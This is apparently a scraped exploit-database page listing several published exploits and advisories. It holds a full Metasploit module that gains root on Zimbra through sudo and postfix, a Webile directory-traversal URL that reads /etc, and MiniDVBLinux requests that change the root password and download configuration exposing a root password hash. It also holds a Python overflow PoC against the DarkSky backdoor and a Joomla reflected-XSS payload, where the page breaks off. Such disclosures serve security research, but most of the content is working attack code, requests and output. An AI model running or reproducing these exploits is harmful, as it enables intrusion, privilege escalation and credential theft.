Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Zimbra sudo + postfix privilege escalation', 'Description' => %q{ This module exploits a vulnerable sudo configuration that permits the zimbra user to execute postfix as root. In turn, postfix can execute arbitrary shellscripts, which means it can execute a root shell. }, 'License' => MSF_LICENSE, 'Author' => [ 'EvergreenCartoons', # discovery and poc 'Ron Bowes', # Module ], 'DisclosureDate' => '2022-10-13', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Privileged' => true, 'References' => [ [ 'CVE', '2022-3569' ], [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ], ], 'Targets' => [ [ 'Auto', {} ], ], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS ] } ) ) register_options [ OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]), OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]), ] register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('PayloadFilename', [ false, 'The name to use for the executable (default: ".<random>"' ]) ] end # Because this isn't patched, I can't say with 100% certainty that this will # detect a future patch (it depends on how they patch it) def check # Sanity check if is_root? fail_with(Failure::None, 'Session already has root privileges') end unless file_exist?("#{datastore['ZIMBRA_BASE']}/common/sbin/postfix") print_error("postfix executable not detected: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix (set ZIMBRA_BASE if Zimbra is installed in an unusual location)") return CheckCode::Safe end unless command_exists?(datastore['SUDO_PATH']) print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)") return CheckCode::Safe end # Run `sudo -n -l` to make sure we have access to the target command cmd = "#{datastore['SUDO_PATH']} -n -l" print_status "Executing: #{cmd}" output = cmd_exec(cmd).to_s if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required') print_error('Current user could not execute sudo -l') return CheckCode::Safe end if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix") print_error('Current user does not have access to run postfix') return CheckCode::Safe end CheckCode::Appears end def exploit base_dir = datastore['WritableDir'].to_s unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end # Generate some filenames payload_path = File.join(base_dir, datastore['PayloadFilename'] || ".#{rand_text_alphanumeric(5..10)}") upload_and_chmodx(payload_path, generate_payload_exe) register_file_for_cleanup(payload_path) cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}" print_status "Attempting to trigger payload: #{cmd}" out = cmd_exec(cmd) unless session_created? print_error("Failed to create session! Cmd output = #{out}") end end end </code></pre>

<pre><code>Document Title: =============== Webile v1.0.1 - Directory Traversal Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2320 Release Date: ============= 2022-10-10 Vulnerability Laboratory ID (VL-ID): ==================================== 2320 Common Vulnerability Scoring System: ==================================== 7.3 Vulnerability Class: ==================== Directory- or Path-Traversal Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application. Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-02-06: Researcher Notification & Coordination (Security Researcher) 2022-02-07: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-10-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A directory traversal web vulnerability has been discovered in the Webile v1.0.1 wifi mobile web application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is not secure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files without secure permission. The bug itself is located in the filepath parameter of the change_upload_dir function. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. Proof of Concept (PoC): ======================= The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/ --- PoC Session Logs --- http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/ Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked --- FS Session Logs --- Output: File name bluetooth bpf carrier compatconfig init permissions ppp seccomp_policy security selinux sensors sysconfig textclassifier theme vintf epdg ipm Security Risk: ============== The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code> MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application suffers from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). -------------------------------------------------------------------- /var/www/tpl/tv_action.sh: -------------------------- 01: #!/bin/sh 02: 03: header 04: 05: quality=60 06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=$.*$&height=$.*$/\1 \2/g")" 07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null -------------------------------------------------------------------- Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5716 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php 24.09.2022 -- 1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 250 Grabbed image /tmp/tv.jpg 60 221 mld closing connection 2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg 3. Or use a browser: - http://ip:8008/home?site=remotecontrol </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.DarkSky.23 Vulnerability: Remote Stack Buffer Overflow (SEH) Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11. Family: DarkSky Type: PE32 MD5: 1164ef21ef2af97e0339359c0dce5e7d Vuln ID: MVID-2022-0648 Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 10/15/2022 Example: 0040134A | 80 34 31 11 | xor byte ptr ds:[ecx+esi],11 | ;XOR converting the payload happens here. 0040134E | 41 | inc ecx | 0040134F | 3B C8 | cmp ecx,eax | 00401351 | 7C F7 | jl sysarchive.40134A | 00401353 | 5E | pop esi | 00401354 | C3 | ret | Python test... >>> 0x41 ^ 0x11 80 >>> hex(80) '0x50' >>> chr(0x50) 'P' GET /AAAAA will then become all "P" ... 0019D24C 56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41 VTE1>PPPPPAAAAAA 0019D25C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0019D26C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0019D27C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0019D28C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41. >>> 0x50 ^ 0x11 65 >>> hex(65) '0x41' >>> chr(65) 'A' EAX : 7EFEFEFE EBX : 02902A58 ECX : 0019F4B0 EDX : 41414141 EBP : 0019D230 ESP : 0019D214 ESI : 0019D777 EDI : 0019FF81 EIP : 7451561B msvcrt.7451561B Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" 0019D240 08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31 .ß...ß......VTE1 0019D250 3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 >AAAAAAAAAAAAAAA 0019D260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0019D270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0019D280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 AAAAAAAAAAAAAAAP 0019D290 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP 0019D2A0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP Memory Dump: (2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available) eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002 eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 ntdll!ZwWaitForMultipleObjects+0xc: 7770ed3c c21400 ret 14h 0:000> .ecxr eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 msvcrt!strcat+0x89: 74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000 *** WARNING: Unable to verify checksum for SysArchive.exe *** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: msvcrt!strcat+89 74515619 8917 mov dword ptr [edi],edx EXCEPTION_RECORD: 0019cd64 -- (.exr 0x19cd64) ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000008 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 001a0000 Attempt to write to address 001a0000 PROCESS_NAME: SysArchive.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 00000015 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 70 APPLICATION_VERIFIER_FLAGS: 0 CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt 74515590 - msvcrt!strcat [ 8b:cc ] 74515617 - msvcrt!strcat+87 (+0x87) [ eb:cc ] 2 errors : !msvcrt (74515590-74515617) CONTEXT: 0019cdb4 -- (.cxr 0x19cdb4) eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 msvcrt!strcat+0x89: 74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000 Resetting default scope WRITE_ADDRESS: 001a0000 FOLLOWUP_IP: msvcrt!strcat+89 74515619 8917 mov dword ptr [edi],edx FAULTING_THREAD: 0000242c BUGCHECK_STR: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 00404ed7 to 74515619 STACK_TEXT: 0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89 WARNING: Stack unwind information not available. Following frames may be wrong. 0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7 0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394 0019f9ec 41414141 41414141 41414141 41414141 0x41414141 0019f9f0 41414141 41414141 41414141 41414141 0x41414141 0019f9f4 41414141 41414141 41414141 41414141 0x41414141 0019f9f8 41414141 41414141 41414141 41414141 0x41414141 0019f9fc 41414141 41414141 41414141 41414141 0x41414141 0019fa00 41414141 41414141 41414141 41414141 0x41414141 0019fa04 41414141 41414141 41414141 41414141 0x41414141 0019fa08 41414141 41414141 41414141 41414141 0x41414141 0019fa0c 41414141 41414141 41414141 41414141 0x41414141 0019fa10 41414141 41414141 41414141 41414141 0x41414141 0019fa14 41414141 41414141 41414141 41414141 0x41414141 0019fa18 41414141 41414141 41414141 41414141 0x41414141 0019fa1c 41414141 41414141 41414141 41414141 0x41414141 0019fa20 41414141 41414141 41414141 41414141 0x41414141 0019fa24 41414141 41414141 41414141 41414141 0x41414141 0019fa28 41414141 41414141 41414141 41414141 0x41414141 0019fa2c 41414141 41414141 41414141 41414141 0x41414141 0019fa30 41414141 41414141 41414141 41414141 0x41414141 ... SYMBOL_NAME: memory_corruption!msvcrt FOLLOWUP_NAME: MachineOwner MODULE_NAME: memory_corruption IMAGE_NAME: memory_corruption DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb FAILURE_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt BUCKET_ID: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt 0:000> !exchain 0019cc18: ntdll!_except_handler4+0 (77716a50) CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (777557ad) 0019f9dc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=5418 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000 PAYLOAD=JUNK+"\r\n\r\n" s.send(PAYLOAD) s.close() print("Backdoor DarkSky.23 Exploit By malvuln") if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code> MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows a remote attacker to change the root password of the system without authentication (disabled by default) and verification of previously assigned credential. Command execution also possible using several POST parameters. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5715 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php 24.09.2022 -- Default root password: mld500 Change system password: ----------------------- POST /?site=setup&section=System HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 778 Content-Type: application/x-www-form-urlencoded Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba Host: ip:8008 Origin: http://ip:8008 Referer: http://ip:8008/?site=setup&section=System Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 sec-gpc: 1 APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+ Pretty post data: APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: r00t BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Kumanovo KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: SYSTEM_PASSWORD Eenable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 WEBIF_PASSWORD_CHECK: 1 action: save params: changed: WEBIF_PASSWORD_CHECK Disable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: WEBIF_PASSWORD_CHECK </code></pre>

<pre><code> MiniDVBLinux 5.4 Config Download Exploit Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application is vulnerable to unauthenticated configuration download when direct object reference is made to the backup function using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. ==================================================================== /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: ------------------------------------------------------------ 01: <? 02: if [ "$GET_action" = "getconfig" ]; then 03: . /etc/rc.config 04: header "Content-Type: application/x-compressed-tar" 05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz" 06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null 07: cat /tmp/backup_config_$$.tgz 08: rm -rf /tmp/backup_config* 09: exit 10: fi 11: ?> 12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div> ==================================================================== Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5713 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php 24.09.2022 -- > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz > mkdir configdir > tar -xvzf config.tgz -C .\configdir > cd configdir && cd etc > type passwd root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh daemon:!:1:1::/: ftp:!:40:2:FTP account:/:/bin/sh user:!:500:500::/home/user:/bin/sh nobody:!:65534:65534::/tmp: _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin > </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │ │ Software : Joomla Vik Appointments 1.7.3 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'filters[group]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=ehfso%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ejo07p&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4 GET parameter 'filters[country]' is vulnerable to XSS Path: /en/our-staff 